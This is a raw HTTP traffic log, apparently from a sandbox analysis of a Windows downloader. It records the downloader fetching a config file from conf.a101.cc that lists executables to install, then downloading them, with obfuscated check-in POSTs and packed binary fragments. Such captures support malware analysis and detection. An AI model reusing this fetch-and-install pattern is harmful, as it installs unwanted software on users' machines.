HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024709301213477898110713
Server: Apache
tracecode: 00024709301213477898110713
Set-Cookie: BAIDUID=B2053B857F2258D27384FF197E418516:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive

.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..
ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00049372701213477898110713
Server: Apache
tracecode: 00049372701213477898110713
Set-Cookie: BAIDUID=6D7EF984AD0193644A842C3587268107:FG=1; expires=Sun, 06-Nov-16 05:00:04 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 131
Connection: Keep-Alive

.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991293201911494410110712
Server: Apache
tracecode: 35991293201911494410110712
Set-Cookie: BAIDUID=005B09C6D83A1A4BB9311240B7EFFFDC:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /tool/install.txt HTTP/1.1
User-Agent: DownUpLoad
Host: conf.a101.cc
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 12:58:57 GMT
Content-Type: application/octet-stream
Content-Length: 344
Last-Modified: Wed, 04 Nov 2015 09:04:40 GMT
Connection: keep-alive
ETag: "5639ca28-158"
Accept-Ranges: bytes
[field0]..url=hXXp://dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCD
ownload71960.exe..[field1]..url=hXXp://download.suxiazai.com/for_down/
2013/install1393485.exe..[field2]..url=hXXp://mm.appkhh.com/mmliao/MM-
liao8863.exe..[field3]..url=hXXp://j.br.baidu.com/v1/t/full/p/mini/tn/
10003408/ch_dl_url.exe..[common]..number=4..filename=qq|rx|mm|bd..



GET /invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe HTTP/1.1
Host: dlied6.qq.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive


HTTP/1.1 302 Found
Server: nws 1.2.15
Connection: close
Date: Sat, 07 Nov 2015 04:59:58 GMT
Expires: Sat, 07 Nov 2015 04:59:58 GMT
Cache-Control: max-age=0
Content-Length: 73
Location: hXXp://203.205.148.185/dlied6.qq.com/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.exe?mkey=563da3bbda60d437&f=1224&p=.exe
The actual URL is '/invc/xfspeed/qqpcmgr/download/QQPCDownload71960.ex
e'...



POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive

.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..
ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00117949801911494410110713
Server: Apache
tracecode: 00117949801911494410110713
Set-Cookie: BAIDUID=2C7B1E2C3C0DA0573611A9CC38E2099E:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive

.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00080725311213477898110713
Server: Apache
tracecode: 00080725311213477898110713
Set-Cookie: BAIDUID=DA04B4066DA68D7200C3C53637253F4C:FG=1; expires=Sun, 06-Nov-16 05:00:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive

.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00109337490271667466110713
Server: Apache
tracecode: 00109337490271667466110713
Set-Cookie: BAIDUID=BA43C3B59B01A15FE3D46D7CEF95CB13:FG=1; expires=Sun, 06-Nov-16 05:00:10 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive

.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00025792010818883082110713
Server: Apache
tracecode: 00025792010818883082110713
Set-Cookie: BAIDUID=B2053B857F2258D266D348C433DA33B2:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 120
Connection: Keep-Alive

.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?#
7;"8xjikhs40,....UV_T\Q_E...opqrstuvw
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00008202790818883082110713
Server: Apache
tracecode: 00008202790818883082110713
Set-Cookie: BAIDUID=32F3C5706F8B24028DF67F10D2BD5887:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:29 GMT
Server: PWS/8.1.20.25
X-Px: rf-ht h0-s1127.p11-fra ( h0-s1214.p11-fra), ht h0-s1214.p11-fra.cdngp.net
ETag: "5506987c-1ede"
Cache-Control: max-age=7200
Expires: Sat, 07 Nov 2015 05:23:11 GMT
Age: 5838
Content-Length: 7902
Content-Type: image/gif
Last-Modified: Mon, 16 Mar 2015 08:46:52 GMT
Connection: keep-alive
GIF89as.r.................................................^....A......
.............! ............B.....}....................1)-t............
........j...........................................................c.
.>..p[E............z...........q.....u.....j.......................
..................Z.................b.................................
.................^................................!.......,....s.r....
.'..........X......'...............................X..................
...........X......................................)....Fz%.K.1.......*
\......#J.H.....3".........I.....'K.S..e..0..\).&..-m...RgO.3w..94(..F
..T.t...P.J.J.*..X...*....%Fr.K....h..].....p....KWn..x....p...'..\...
.... ^......#[email protected].......
|....q ..{.....K...te...k..0...'....F......_.........O..............z.
...B.Y_:.....6.........ZP...b(a..n.!......!.8..".h..(..b.0....2.x..8..
..;>...@.._.D.i...&i`..q.1..PF)..P>Y..Db...\....^....Y.Y&.[..&._
....o....r....l.y..|......J....j(.5$...p\..gIzV..p.....f....v.....*...
.j.............".....j..<........... ....k...&....6...MD m...X...8.
...L.....;m.........n....n........ko...................0..$....7....G,
....`...< ........C ...$.l.....2.*[.2./.... ..2.7..3.;.,..<....=
.-t.H..t.L....PG-..TS...Xg...(t.5...$.....I......_....p{..._....(..w.|
....}..w...>.............G....W....d....w.y......].`..80 6.........
....n............../....o|..$..........Q..U...GF0....w...../.....o....
.........3 [email protected]......:......'H..Z.......
<<< skipped >>>


POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive

.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00049406280658453514110713
Server: Apache
tracecode: 00049406280658453514110713
Set-Cookie: BAIDUID=6D7EF984AD0193644126EE9989BC78F5:FG=1; expires=Sun, 06-Nov-16 05:00:04 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /for_down/2013/install1393485.exe HTTP/1.1
Host: download.suxiazai.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 4787104
Date: Thu, 29 Oct 2015 05:44:24 GMT
Content-Type: application/octet-stream
ETag: "a88697daded0d01:608b2"
Server: Microsoft-IIS/6.0
Last-Modified: Fri, 07 Aug 2015 07:01:16 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
Age: 774938
Via: http/1.1 fnop003-GDSTDX-CT-248-102 (ACA/2.0 ACA_HIT), http/1.1 fnop003-ZJHZFY-CT-11-158 (ACA/2.0 ACA_HIT), http/1.1 fnop003-ZJHZFY-CT-11-165 (ACA/2.0 ACA_HIT)
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........c.........
......m.......d.....1.......<.R.....<.P.......P.....E...........
B...1.m.....1.R.#...S.S.....1.W.....Rich............PE..L....i.T......
...............0......`.............@........................... .....
j.I.........................................D........'............H...
..........................................P...H.......................
....................UPX0....................................UPX1......
[email protected].......*..................@...
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.............3.07.UPX!....^v..........W....^Q.&..W_h;...(..{.U..A...;U
#.8S..(....t.ZG(.W.R..-G.V..._.......V.Ig.............:...G......u.(..
..#.Q.B...T.......$.9..]...w.ZZ.dE.W..._..fw ..V/............ .[.r.XO.
.L..q...;\...XI....2n_L......Y..qZG..)..'MA.h.3..Q...by^.XH........=..
&.al$j..M..Z.~i..cmF..*..^.).zg..,7...!.$.or...TI\.^..lV.Zg..D..I...}.
EW..o.z.."O.....g......$..UV.O...dp..<$X&W.J...>....>....l.C.
.d(.i.n.*[email protected]..&K|....!......$................J.~..$..@p
....................K.1Srb{.7.SQ......L.....?.i...m.y..N.u.)....u.
<<< skipped >>>


POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 102
Connection: Keep-Alive

.#4H.......:R6.f............................77.9:;TIJOznm.)k'78""#b.!".<??=49x..w75<1gXWQM...ghijklmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999987180581376522110712
Server: Apache
tracecode: 35999987180581376522110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B79939E6BDE03F0EE:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /commit?cmd=finfo HTTP/1.1
Content-Length: 700
Connection: Keep-Alive

.#4H..........T.........................................a..................................................................................S8.....[3..
Z*.............V. [email protected][X.^VOY.D[MO%$&l546$%.8d("9!<>37{.....5,211>.VSZRUH..jklmnopqrstuvwxyz{|}~......M.....y.......8..w..u.....lB...<Sr..{...?.....9gO..
.....6V.......0.h<..u.g....."O...R...M]..t42.5.'...'a...W .ST.E...`t.;.....\. ....`.,w...09.\.
_...N...a6..T..Y".......{......{f...h
....<)..8....
m.];>`......l..$S.~..N.fZ.{]......9r.....!...\....S.p...1{~T....V.`...h..p.mGSOJ.^q.t........:......2......]6v..*.... ..a...&....^....r:........~{4.6.:..~.({...o...5(...)7=.7(..I....R.ui.....g/.o..
.p...q.s.."#$%&'()..:-./01
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00136416251213477898110713
Server: Apache
tracecode: 00136416251213477898110713
Set-Cookie: BAIDUID=67699F784E2A0D23E0CC41DD2DA72AC7:FG=1; expires=Sun, 06-Nov-16 05:00:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /ptlogin/ver/10139/js/xui.js?v=10007 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Sat, 07 Nov 2015 05:00:29 GMT
Server: PWS/8.1.20.25
X-Px: ms h0-s1127.p11-fra ( h0-s1129.p11-fra), ht h0-s1129.p11-fra.cdngp.net
ETag: "5636be2e-21f8"
Cache-Control: max-age=600
Expires: Sat, 07 Nov 2015 05:00:41 GMT
Age: 588
Content-Length: 3459
Content-Type: application/x-javascript
Content-Encoding: gzip
Vary: Accept-Encoding
Last-Modified: Mon, 02 Nov 2015 01:36:46 GMT
Connection: keep-alive
......6V...Z.w.... X....,..i..qR'..........#.....w........O.i.#''.F..4
3..4.2.m.......s.D...E`'....0q.2..n}....2..E.g..oD$G.....=.Ca..w.j..M.
[email protected]\[email protected]...]R.m6.....zr~u.K.8}wv.K....H5........LWj.
..X.\..=5.>:...:9$....S......?V.*v.....vG...`.{..t...v.....<.".N
.:.(.b.G....:....:..g.............1...r.......9H..cT.._.....Z.n.p.....
&...8t.0P......C....LN........._..;[email protected]......._...^....F
dbq.LI..na...p......X...F.r.....2...6.q..8..H.B....;j .......-.....fs.
j.Q .......?..Kb&H........>h.|.......e>...*...H..J<.E?..Uv.,.
@77W.O...C.]O...,.....Co.,.z.1*..W....j..J.\..s=...`.....*.../Dma.....
t.p.0...~......1$m3...;F~>n&_f?_\}<..]^..._.&>..T.<..".S..
..b.......;...f...IL..E.Q...U>..P..iZ..B*V....V..../....|....&.....
.|.....)........[l..!..N..........R=. dZ.X...x........_,...!."t.~_...-
.....g!....1..S.#..J.~...p .q..q.....n....uX..sZ._..u...D... s...F....
._~4.;.......b..=..k.Kh=.....s...vp.8....f.....*Y..K.s|..4..f....p.w.G
.........I.......&]3...........GU....rh/. V.@...?.....{.HC......A.}.".
.5L.&.....v....4...$..$h.....a"j2..F...4j>$Y...[l.8....jR .G.QC...5
.....3..;.e..O..w....63Z...Q.z!.|N.*. ....9@k..?.............#..#.-C.Q
:....r.....][email protected].\........un.Z5.wC.J.>I..!@(...*.....
../^..7g.g.'....../.L.J.{.G}....Hq....e.4.%."..3......e....i.|..d.8.9.
.G...L....z......}[email protected]'#.<.......%.....E*t.......F....Y.%.....zrzq
~3Q0.K....V.)1*.......... ..j....... Z.h..k...v..b.xL..*I.........@v..
N?&p...&.....O...........H..-...jO....tN.....@B4vJ.@.....?.1>..
<<< skipped >>>


POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 131
Connection: Keep-Alive

.#4H.......W.>...............................................................frrfaa)vyyifk.!k.f|.{tr8IHJXXriqLNCG......OSI-./012345
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00000046110818948618110713
Server: Apache
tracecode: 00000046110818948618110713
Set-Cookie: BAIDUID=32F3C5706F8B2402C2AC3D655372071C:FG=1; expires=Sun, 06-Nov-16 05:00:00 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 120
Connection: Keep-Alive

.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?#
7;"8xjikhs40,....UV_T\Q_E...opqrstuvw
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999768410581376522110712
Server: Apache
tracecode: 35999768410581376522110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B4ADDD1A7D9EA5912:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive

.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00063499440581376522110713
Server: Apache
tracecode: 00063499440581376522110713
Set-Cookie: BAIDUID=FD9EDA96E9FFC3CC09AA604EAEAD5BD2:FG=1; expires=Sun, 06-Nov-16 05:00:06 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive

.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK..
ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024854541213477898110713
Server: Apache
tracecode: 00024854541213477898110713
Set-Cookie: BAIDUID=B2053B857F2258D280860D7625D53A9A:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a..<html>..<head><title>302 Found</title><
/head>..<body bgcolor="white">..<center><h1>302 F
ound</h1></center>..<hr><center>nginx</cent
er>..</body>..</html>..0..



GET /cgi-bin/report?id=89217 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ui.ptlogin2.qq.com
Connection: Keep-Alive
Cookie: pt_local_token=-1924241393; ptui_qstatus=3


HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sat, 07 Nov 2015 05:00:30 GMT
Pragma: no-cache
Cache-Control: no-cache; must-revalidate
Content-Type: image/bmp;
Content-Length: 66
BMB.......>...(...................................................H
TTP/1.1 200 OK..Connection: keep-alive..Keep-Alive: timeout=50, max=10
24..Server: QZHTTP-2.38.20..Date: Sat, 07 Nov 2015 05:00:30 GMT..Pragm
a: no-cache..Cache-Control: no-cache; must-revalidate..Content-Type: i
mage/bmp;..Content-Length: 66..BMB.......>...(.....................
................................



GET /View/Home/Task/css.base.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:50 GMT
Content-Type: text/css
Content-Length: 4860
Last-Modified: Mon, 19 Oct 2015 03:49:41 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "56246855-12fc"
Expires: Sat, 07 Nov 2015 16:59:50 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
html,body {..  overflow-x: hidden;..}..body {..  background: #ebebeb;.
.  position: relative;...font-family: "Helvetica Neue","Microsoft YaHe
i","............",Helvetica,Tahoma,Arial,STXihei,sans-serif;..}..a{.. 
 color: #333;..}..a:hover,a:focus {..  color: #f60;..  text-decoration
: none;..}..a:focus {..  outline: thin dotted;..  outline: 5px auto -w
ebkit-focus-ring-color;..  outline-offset: -2px;..}../*bootstrap field
set*/..fieldset{..}..legend{...width:auto;..}../*bootstrap family*/../
*model*/...modal-scrollbar-measure {...display:none..}../*bootstrap na
v*/...navbar{...margin:0px;...border:none;...border-radius: 0;..}...na
vbar-inverse .navbar-nav>li>a{..  color: #fff;..}...navbar-inver
se .navbar-nav>li>a:hover{..  color: #999;..}...navbar-inverse .
navbar-nav>.active>a,...navbar-inverse .navbar-nav>.active>
;a:focus,...navbar-inverse .navbar-nav>.active>a:hover{..  color
: #ddd;..  background-color:#080808;..}...navbar-collapse{...font-size
: 1.1em;..}../*bootstrap page*/...pagination > li > a,...paginat
ion > li > span {..  position: relative;..  float: left;..  padd
ing: 6px 12px;..  margin: 0px 5px;..  line-height: 1.45;..  color: #22
2;..  text-decoration: none;..  background-color: #fff;..  border: 1px
 solid #ddd;..}...pagination > li.disabled > a{..  font-weight: 
bold;...}...pagination > li > a:hover,...pagination > li >
 span:hover,...pagination > li > a:focus,...pagination > li &
gt; span:focus {..  color: #2cab93;..  background-color: #eee;..  
<<< skipped >>>

GET /View/Home/Task/css.task.css?1.0.247 HTTP/1.1


Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:50 GMT
Content-Type: text/css
Content-Length: 2042
Last-Modified: Mon, 19 Oct 2015 07:02:19 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "5624957b-7fa"
Expires: Sat, 07 Nov 2015 16:59:50 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
/*task inc*/..h4,h4 a{..  color: #F60;..}..h4 a:hover{..  color: #333;
..}../*channel/list/tag*/...dc-item li{..  margin-bottom: 20px;..  ove
rflow: hidden;..}...dc-item p{ ..  line-height: 2.0;..}...dc-item p.le
ad{...color: #666;...margin: 0px;...font-size: 1.0em;..}...dc-item p.l
ead a{...color: #666;...margin-left: 5px;..}...dc-item p.lead a:hover{
...color: #017e66;..}...dc-item p.lead .btn-sm{...padding:2px 4px;...m
argin:2px;..}...dc-item p.info{...color: #888;...font-size: 1.0em;..}.
..dc-item-hot li{...color: #f60;...padding: 5px 0;..}../*detail*/..a.d
c-prev{...margin-right:10px;..}...dc-task{...padding-top:10px;..  marg
in-bottom: 15px;...color: #333;...font-size: 1.25em;...overflow: hidde
n;..}...dc-task p{...line-height:1.4em;..}...dc-task .score{...font-si
ze:1.0em;...color:#666;..}...dc-task .score em{...color: #F30;...margi
n:0 5px;...font-style:normal;...font-size:1.4em;..}...dc-task .cycle{.
..font-size:1.0em;...color: #F30;...margin:0 5px;...font-weight:normal
;..}...dc-task-pad{...padding:40px 0;..}...dc-content{..  margin-botto
m: 15px;...font-size: 1.2em;..  line-height: 1.8em;...color: #555;...o
verflow: hidden;..}...dc-content a{..  color: #f60;..}...dc-content a:
hover{..  color: #333;..}...dc-content .nav-tabs{..  margin-top:15px;.
.}...dc-content .tab-content{..  padding-top: 15px;..}...dc-content .a
pply{..  padding:20px 0;..  text-align: center;..}...dc-content .dc-im
age{...margin:0 auto;..}...dc-content table td{..  padding-left: 10px;
..}...dc-content pre {...border-radius: 0;..  margin: 1.64em 0;.. 
<<< skipped >>>

GET /Public/html5shiv/3.7.2/html5shiv.min.js HTTP/1.1


Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:51 GMT
Content-Type: application/javascript
Content-Length: 2639
Last-Modified: Sat, 14 Mar 2015 18:06:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "550478a6-a4f"
Expires: Sat, 07 Nov 2015 16:59:51 GMT
Cache-Control: max-age=43200
